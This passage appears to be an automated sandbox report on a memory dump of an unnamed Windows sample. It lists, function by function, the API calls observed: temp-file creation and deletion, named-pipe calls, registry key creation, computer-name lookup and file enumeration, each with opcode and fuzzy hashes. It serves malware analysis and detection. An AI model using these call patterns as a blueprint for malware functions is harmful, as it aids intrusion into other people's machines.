                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9118
                                                              • Part of subcall function 04BB90ED: GetCurrentThreadId.KERNEL32 ref: 04BB9125
                                                              • Part of subcall function 04BB90ED: GetSystemTimeAsFileTime.KERNEL32(04BAEE33,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9131
                                                              • Part of subcall function 04BB90ED: GetTempFileNameA.KERNEL32(00000000,00000000,04BAEE33,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?), ref: 04BB913F
                                                              • Part of subcall function 04BB90ED: lstrcpy.KERNEL32(00000000), ref: 04BB9161
                                                            • lstrlen.KERNEL32(00000000,?,00000F00), ref: 04BA3EEA
                                                              • Part of subcall function 04BAB869: lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,04BA3F0E,?,00000000,000000FF,?,00000F00), ref: 04BAB87A
                                                              • Part of subcall function 04BAB869: lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,04BA3F0E,?,00000000,000000FF,?,00000F00), ref: 04BAB881
                                                              • Part of subcall function 04BAB869: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 04BAB893
                                                              • Part of subcall function 04BAB869: _snprintf.NTDLL ref: 04BAB8B9
                                                              • Part of subcall function 04BAB869: _snprintf.NTDLL ref: 04BAB8ED
                                                              • Part of subcall function 04BAB869: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 04BAB90A
                                                            • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 04BA3F84
                                                            • HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 04BA3FA1
                                                            • DeleteFileA.KERNEL32(00000000,00000000,?,?,?,00000000,000000FF,?,00000F00), ref: 04BA3FA9
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF,?,00000F00), ref: 04BA3FB8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                                            • String ID: s:
                                                            • API String ID: 2960378068-2363032815
                                                            • Opcode ID: fc7e26e031b03a938fb8c1466c8cb71784031b10158ba5cd0e9fb39ab700fb8d
                                                            • Instruction ID: 7885f02df3cb07d0fa1ece0d44fc25e71f7dd6e9942ac188845656eff74f5675
                                                            • Opcode Fuzzy Hash: fc7e26e031b03a938fb8c1466c8cb71784031b10158ba5cd0e9fb39ab700fb8d
                                                            • Instruction Fuzzy Hash: 22312D72904209AFDB109FA9DCC4FEEBBFCEB08214F050595E615E3141EB75AA158B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(04BA47C4,00000000,00000000,?,?,?,04BA47C4,00000035,00000000,-00000005,00000000), ref: 04BAA727
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04BAA73D
                                                            • memcpy.NTDLL(00000010,04BA47C4,00000000,?,?,04BA47C4,00000035,00000000), ref: 04BAA773
                                                            • memcpy.NTDLL(00000010,00000000,00000035,?,?,04BA47C4,00000035), ref: 04BAA78E
                                                            • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 04BAA7AC
                                                            • GetLastError.KERNEL32(?,?,04BA47C4,00000035), ref: 04BAA7B6
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,04BA47C4,00000035), ref: 04BAA7D9
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                                            • String ID:
                                                            • API String ID: 2237239663-0
                                                            • Opcode ID: 49717282269fcf62bf42f175149d99c06a325c73d1df06aa7b30aecce950872c
                                                            • Instruction ID: 8aed11bf571e16f636e94bea7cacab6f6cd64ca5d6758deade1fb4d5fff98566
                                                            • Opcode Fuzzy Hash: 49717282269fcf62bf42f175149d99c06a325c73d1df06aa7b30aecce950872c
                                                            • Instruction Fuzzy Hash: 8B317F36900209EBDB218F65D884EABBBB8EB4C751F004466E955D3200E234E964DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04BBCE00
                                                            • lstrcmpiW.KERNEL32(00000000,?,73BCF710,?,?,?,04BB3066), ref: 04BBCE38
                                                            • lstrcmpiW.KERNEL32(?,?,?,?,?,04BB3066), ref: 04BBCE4D
                                                            • lstrlenW.KERNEL32(?,?,?,?,04BB3066), ref: 04BBCE54
                                                            • CloseHandle.KERNEL32(?,?,?,?,04BB3066), ref: 04BBCE7C
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,04BB3066), ref: 04BBCEA8
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BBCEC6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                                            • String ID:
                                                            • API String ID: 1496873005-0
                                                            • Opcode ID: 95468885db579676b5f03b051de5f27e017dd62b3a9bcf7c91a8c5e1fbc45ab3
                                                            • Instruction ID: 5513591212064b6162fd9db0e7afcc378b87b3e3351c72d57c4257606138214d
                                                            • Opcode Fuzzy Hash: 95468885db579676b5f03b051de5f27e017dd62b3a9bcf7c91a8c5e1fbc45ab3
                                                            • Instruction Fuzzy Hash: 9521FB72900205EBEB209FB5DCC4EBF7BBCEF08645B04099AA545E2101DBB4F9059BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(04BA717C,00000000,04BCC320,04BCC340,?,?,04BA717C,04BA2555,04BCC320), ref: 04BBEE5F
                                                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04BBEE75
                                                            • lstrlen.KERNEL32(04BA2555,?,?,04BA717C,04BA2555,04BCC320), ref: 04BBEE7D
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BBEE89
                                                            • lstrcpy.KERNEL32(04BCC320,04BA717C), ref: 04BBEE9F
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,04BA717C,04BA2555,04BCC320), ref: 04BBEEF3
                                                            • HeapFree.KERNEL32(00000000,04BCC320,?,?,04BA717C,04BA2555,04BCC320), ref: 04BBEF02
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                                            • String ID:
                                                            • API String ID: 1531811622-0
                                                            • Opcode ID: 736f5703f4336a9aca4655762a7af32779d378843dfce3bbb9dcc106564504cc
                                                            • Instruction ID: e4b3d221d84a0b774cb53bd77055a2bb3bf8180951f9da85708bed08ad1d3b28
                                                            • Opcode Fuzzy Hash: 736f5703f4336a9aca4655762a7af32779d378843dfce3bbb9dcc106564504cc
                                                            • Instruction Fuzzy Hash: 44219531104245EFEB224F65DC84FFA7FAAEB4A350F15409AE89497261C775EC45CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,04BA2273,00000000), ref: 04BAC493
                                                              • Part of subcall function 04BBAC39: lstrcpy.KERNEL32(-000000FC,00000000), ref: 04BBAC73
                                                              • Part of subcall function 04BBAC39: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,04BAC4A0,?,?,00000000,?,04BA2273,00000000), ref: 04BBAC85
                                                              • Part of subcall function 04BBAC39: GetTickCount.KERNEL32 ref: 04BBAC90
                                                              • Part of subcall function 04BBAC39: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,04BAC4A0,?,?,00000000,?,04BA2273,00000000), ref: 04BBAC9C
                                                              • Part of subcall function 04BBAC39: lstrcpy.KERNEL32(00000000), ref: 04BBACB6
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • lstrcpy.KERNEL32(00000000), ref: 04BAC4CE
                                                            • wsprintfA.USER32 ref: 04BAC4E1
                                                            • GetTickCount.KERNEL32 ref: 04BAC4F6
                                                            • wsprintfA.USER32 ref: 04BAC50B
                                                              • Part of subcall function 04BC3C4A: RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                                            • String ID: "%S"
                                                            • API String ID: 1152860224-1359967185
                                                            • Opcode ID: 5de4ebd98a33dd13b8e82b8aad5345c2eec0418bd519ac2d1ec93539393ed795
                                                            • Instruction ID: bcf0dd9a24756439ebecb91c80c20630f81d242abda2d59300f40eb092b42f24
                                                            • Opcode Fuzzy Hash: 5de4ebd98a33dd13b8e82b8aad5345c2eec0418bd519ac2d1ec93539393ed795
                                                            • Instruction Fuzzy Hash: E711AF729043196BE2107B68ECC4EAF3BECEF48615F058099F909A3201CE78FC118BB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000), ref: 04BB90FF
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9118
                                                              • Part of subcall function 04BB90ED: GetCurrentThreadId.KERNEL32 ref: 04BB9125
                                                              • Part of subcall function 04BB90ED: GetSystemTimeAsFileTime.KERNEL32(04BAEE33,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9131
                                                              • Part of subcall function 04BB90ED: GetTempFileNameA.KERNEL32(00000000,00000000,04BAEE33,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?), ref: 04BB913F
                                                              • Part of subcall function 04BB90ED: lstrcpy.KERNEL32(00000000), ref: 04BB9161
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00001ED2,00000000,00000000,?,00000000,04BB77BB,?), ref: 04BA8DF5
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00001ED2,00000000,00000000,?,00000000,04BB77BB,?,00000000,00000000,00000000,00000000,00000000), ref: 04BA8E68
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 2078930461-0
                                                            • Opcode ID: 8d84a96ad898ad67d1a33277285d3b80d76dd285af0aa21504591999d44a523b
                                                            • Instruction ID: 0c1e3f851b5c0b50561fb398a7c2059f2e8d37f4364d4191eca970213ceb23d5
                                                            • Opcode Fuzzy Hash: 8d84a96ad898ad67d1a33277285d3b80d76dd285af0aa21504591999d44a523b
                                                            • Instruction Fuzzy Hash: B411BF31148319FBE7312B21ECC9F6F3F6DEB49761F000926F601A6591D66AAC6486F0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BA9622: lstrlen.KERNEL32(00000000,00000000,73BB81D0,00000000,?,?,?,04BB7DD0,?,00000000,00000000,?,?,04BB63BE,00000000,05C8B188), ref: 04BA9689
                                                              • Part of subcall function 04BA9622: sprintf.NTDLL ref: 04BA96AA
                                                            • lstrlen.KERNEL32(00000000,73BB81D0,?,00000000,00000000,?,?,04BB63BE,00000000,05C8B188), ref: 04BB7DE2
                                                            • lstrlen.KERNEL32(?,?,?,04BB63BE,00000000,05C8B188), ref: 04BB7DEA
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • strcpy.NTDLL ref: 04BB7E01
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04BB7E0C
                                                              • Part of subcall function 04BB1766: lstrlen.KERNEL32(?,?,?,00000000,?,04BB7E1B,00000000,?,?,?,04BB63BE,00000000,05C8B188), ref: 04BB1777
                                                              • Part of subcall function 04BC3C4A: RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
                                                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04BB63BE,00000000,05C8B188), ref: 04BB7E29
                                                              • Part of subcall function 04BC1D0B: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04BB7E35,00000000,?,?,04BB63BE,00000000,05C8B188), ref: 04BC1D15
                                                              • Part of subcall function 04BC1D0B: _snprintf.NTDLL ref: 04BC1D73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                            • String ID: =
                                                            • API String ID: 2864389247-1428090586
                                                            • Opcode ID: 1893ae2446c19fe060e6262871f0d39ba28a7364ec2c4ad0130fd68cc0d0d02b
                                                            • Instruction ID: 999bdffc7e2aa82ce696f3987188a6ccbbc6d96cfc79c74a163836c6abbcd6ac
                                                            • Opcode Fuzzy Hash: 1893ae2446c19fe060e6262871f0d39ba28a7364ec2c4ad0130fd68cc0d0d02b
                                                            • Instruction Fuzzy Hash: 03119E779012296757127BB89CC4CBF36ADDE89A59309809AFA05A7200DE78ED0257E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000), ref: 04BB90FF
                                                              • Part of subcall function 04BB90ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9118
                                                              • Part of subcall function 04BB90ED: GetCurrentThreadId.KERNEL32 ref: 04BB9125
                                                              • Part of subcall function 04BB90ED: GetSystemTimeAsFileTime.KERNEL32(04BAEE33,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?,0000000E), ref: 04BB9131
                                                              • Part of subcall function 04BB90ED: GetTempFileNameA.KERNEL32(00000000,00000000,04BAEE33,00000000,?,?,?,04BB7791,00000929,00000000,?,?,04BB99D0,00000000,00000000,?), ref: 04BB913F
                                                              • Part of subcall function 04BB90ED: lstrcpy.KERNEL32(00000000), ref: 04BB9161
                                                            • lstrcpy.KERNEL32(-000000FC,00000000), ref: 04BBAC73
                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,04BAC4A0,?,?,00000000,?,04BA2273,00000000), ref: 04BBAC85
                                                            • GetTickCount.KERNEL32 ref: 04BBAC90
                                                            • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,04BAC4A0,?,?,00000000,?,04BA2273,00000000), ref: 04BBAC9C
                                                            • lstrcpy.KERNEL32(00000000), ref: 04BBACB6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                                                            • String ID: \Low
                                                            • API String ID: 1629304206-4112222293
                                                            • Opcode ID: 5d1719a4b44523756ae69cf7de7e306110d090a5304f0a7bd96e9e1d132e5250
                                                            • Instruction ID: e42c17a0221c6361cb353fc29dcd9d16ff901c36345b62008d5831bfe788c14b
                                                            • Opcode Fuzzy Hash: 5d1719a4b44523756ae69cf7de7e306110d090a5304f0a7bd96e9e1d132e5250
                                                            • Instruction Fuzzy Hash: C001C031A016187BD2122B75DC8CFAF779CDF8D602B054062F551D3180DB98FD0086F4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(04BA2555,00000000,00000000,04BCC340,?,?,04BA718B,04BA2555,00000000,04BA2555,04BCC320), ref: 04BB45D0
                                                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 04BB45DE
                                                            • wsprintfA.USER32 ref: 04BB45FA
                                                            • RegCreateKeyA.ADVAPI32(80000001,04BCC320,00000000), ref: 04BB4612
                                                            • lstrlen.KERNEL32(?), ref: 04BB4621
                                                            • RegCloseKey.ADVAPI32(?), ref: 04BB463A
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BB4649
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heaplstrlen$AllocateCloseCreateFreewsprintf
                                                            • String ID:
                                                            • API String ID: 3908752696-0
                                                            • Opcode ID: 549602fa735d90e84575be9ab7142e382f018c5d2ecb125fd4eff7e4b6ec0945
                                                            • Instruction ID: 55a70b0cf6cad8df0c806cd089fd5480023eeea76d826ff4394ca15e7db68ca4
                                                            • Opcode Fuzzy Hash: 549602fa735d90e84575be9ab7142e382f018c5d2ecb125fd4eff7e4b6ec0945
                                                            • Instruction Fuzzy Hash: A9113932100108FFDB015FA5ECC9EAE3B7DFB48715F100026FA0597160DAB6AD649BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wsprintfA.USER32 ref: 04BAB7CC
                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 04BAB7DE
                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 04BAB808
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04BAB81B
                                                            • CloseHandle.KERNEL32(?), ref: 04BAB824
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                                                            • String ID: 0x%08X
                                                            • API String ID: 603522830-3182613153
                                                            • Opcode ID: 579f46205267ede8afbe39f2cc418cf48cad078306168056949af3f0f1a7e801
                                                            • Instruction ID: 8cbe04370bcd3eaa746e0133eacd5cefae718051c90b678b24b3cc85879108fe
                                                            • Opcode Fuzzy Hash: 579f46205267ede8afbe39f2cc418cf48cad078306168056949af3f0f1a7e801
                                                            • Instruction Fuzzy Hash: B7015E71904119BBCB109BA4DC89DEF7F7CEF09351F004155E526E2181DB74AA11CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • GetLastError.KERNEL32(?,?,?,00001000), ref: 04BA35C4
                                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,?), ref: 04BA3649
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BA3663
                                                            • OpenProcess.KERNEL32(00100000,00000000,00000000,?,?), ref: 04BA3698
                                                              • Part of subcall function 04BC3C5F: RtlReAllocateHeap.NTDLL(00000000,?,?,04BA3607), ref: 04BC3C6F
                                                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 04BA371A
                                                            • CloseHandle.KERNEL32(?), ref: 04BA3741
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                                                            • String ID:
                                                            • API String ID: 3115907006-0
                                                            • Opcode ID: a80e40135b80b754de335e528898440573f97e8b50b2560b929a314cc0a56279
                                                            • Instruction ID: 86d1d0e39864aa6200dbd19b4b336b32e79fcb344ebb179a9cfb30edc0a60958
                                                            • Opcode Fuzzy Hash: a80e40135b80b754de335e528898440573f97e8b50b2560b929a314cc0a56279
                                                            • Instruction Fuzzy Hash: F4812A71E08219EFDF11CF98C984AAEBBF5FF08744F149499E805AB250D731AD60DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(?), ref: 04BAF0D9
                                                              • Part of subcall function 04BB93FF: lstrlenW.KERNEL32(00000000,73BCF560,00000000,?,00000000), ref: 04BB942B
                                                              • Part of subcall function 04BB93FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 04BB943D
                                                              • Part of subcall function 04BB93FF: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 04BB945A
                                                              • Part of subcall function 04BB93FF: lstrlenW.KERNEL32(00000000), ref: 04BB9466
                                                              • Part of subcall function 04BB93FF: HeapFree.KERNEL32(00000000,00000000), ref: 04BB947A
                                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04BAF111
                                                            • CloseHandle.KERNEL32(?), ref: 04BAF11F
                                                            • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 04BAF1F1
                                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BAF200
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 04BAF213
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                                            • String ID:
                                                            • API String ID: 1719504581-0
                                                            • Opcode ID: 23d112145548f5b572aab2e593447dba655921d58f04cf1c1bafbd165e65e798
                                                            • Instruction ID: 349f3ad59028a846258469c10a3e8c25b71039080f405104bc99752072c92107
                                                            • Opcode Fuzzy Hash: 23d112145548f5b572aab2e593447dba655921d58f04cf1c1bafbd165e65e798
                                                            • Instruction Fuzzy Hash: 56418D36604606EBDB219F94D8C8EEA7BB9FB48704F0100A6E904AB110DB74FD64CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aacfbdb73c560d389bd5ca5f617350debbb2c91b9088da663ef27184614e5919
                                                            • Instruction ID: 6f1716c766b25f3ff86d22bc8cbbe7b4b6263268d219216246ea99762d1fa420
                                                            • Opcode Fuzzy Hash: aacfbdb73c560d389bd5ca5f617350debbb2c91b9088da663ef27184614e5919
                                                            • Instruction Fuzzy Hash: 3641B4715487019FD7309F79C8C696BBBE9FB88365B004A6EF1A6C3580D771F8218B61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,04BA9A91), ref: 04BA37D0
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,04BA9A91,?,?,?,00000000,04BA81F8), ref: 04BA3803
                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04BA382A
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BA383E
                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04BA384B
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04BA386E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateComputerFreeName
                                                            • String ID:
                                                            • API String ID: 3439771632-0
                                                            • Opcode ID: 19a31ed4a4d99119001c96ca4cc37566df276f38552ba625efcc3e060f3fa8bf
                                                            • Instruction ID: e4724246070abdc65dcd555393565e62fb55bdb00b3e3faf84d37e2cb1d3f633
                                                            • Opcode Fuzzy Hash: 19a31ed4a4d99119001c96ca4cc37566df276f38552ba625efcc3e060f3fa8bf
                                                            • Instruction Fuzzy Hash: 6031F976A04209EFEB10DFB9D8C1A6EB7F9FB48210F51446AE905D3240D734ED548B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04BB4B63: lstrlen.KERNEL32(?,770F4620,00000000,?,00000000,04BA1211,?), ref: 04BB4B72
                                                              • Part of subcall function 04BB4B63: mbstowcs.NTDLL ref: 04BB4B8E
                                                            • lstrlenW.KERNEL32(00000000,?), ref: 04BAC042
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C11
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,00000000), ref: 04BC0C1D
                                                              • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0C65
                                                              • Part of subcall function 04BC0BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BC0C80
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(0000002C), ref: 04BC0CB8
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(?), ref: 04BC0CC0
                                                              • Part of subcall function 04BC0BC5: memset.NTDLL ref: 04BC0CE3
                                                              • Part of subcall function 04BC0BC5: wcscpy.NTDLL ref: 04BC0CF5
                                                            • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 04BAC063
                                                            • lstrlenW.KERNEL32(04BAEE33), ref: 04BAC08D
                                                              • Part of subcall function 04BC0BC5: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 04BC0D1B
                                                              • Part of subcall function 04BC0BC5: RtlEnterCriticalSection.NTDLL(?), ref: 04BC0D50
                                                              • Part of subcall function 04BC0BC5: RtlLeaveCriticalSection.NTDLL(?), ref: 04BC0D6C
                                                              • Part of subcall function 04BC0BC5: FindNextFileW.KERNEL32(?,00000000), ref: 04BC0D85
                                                              • Part of subcall function 04BC0BC5: WaitForSingleObject.KERNEL32(00000000), ref: 04BC0D97
                                                              • Part of subcall function 04BC0BC5: FindClose.KERNEL32(?), ref: 04BC0DAC
                                                              • Part of subcall function 04BC0BC5: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BC0DC0
                                                              • Part of subcall function 04BC0BC5: lstrlenW.KERNEL32(0000002C), ref: 04BC0DE2
                                                            • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 04BAC0AA
                                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 04BAC0C1
                                                            • PathFindFileNameW.SHLWAPI(0000001E), ref: 04BAC0D6
                                                              • Part of subcall function 04BBEDBE: lstrlenW.KERNEL32(00000000,?,00000002,00000000,?,?,?,04BAC0ED,?,0000001E,?), ref: 04BBEDD3
                                                              • Part of subcall function 04BBEDBE: lstrlenW.KERNEL32(00000000,?,?,?,04BAC0ED,?,0000001E,?), ref: 04BBEDDB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                                            • String ID:
                                                            • API String ID: 2670873185-0
                                                            • Opcode ID: 7ab4f38be0c6ef099a57e0b4734ca1f9e77151cf5f7d5424137a0a2b0270d5cc
                                                            • Instruction ID: 7c6b5668c073d4e3046cbfba6c75a085e4c6a8ed402164ed77155c15bed0ed68
                                                            • Opcode Fuzzy Hash: 7ab4f38be0c6ef099a57e0b4734ca1f9e77151cf5f7d5424137a0a2b0270d5cc
                                                            • Instruction Fuzzy Hash: 79314D72508205AFDB10EF64C8C486FBBF9FB88258F00496EF59493110E735ED658B62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 04BB0615
                                                              • Part of subcall function 04BBB54C: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,04BA138B,00000000,04BCC16C,00000000), ref: 04BBB572
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,04BA1C48,00000000), ref: 04BB0657
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 04BB06A9
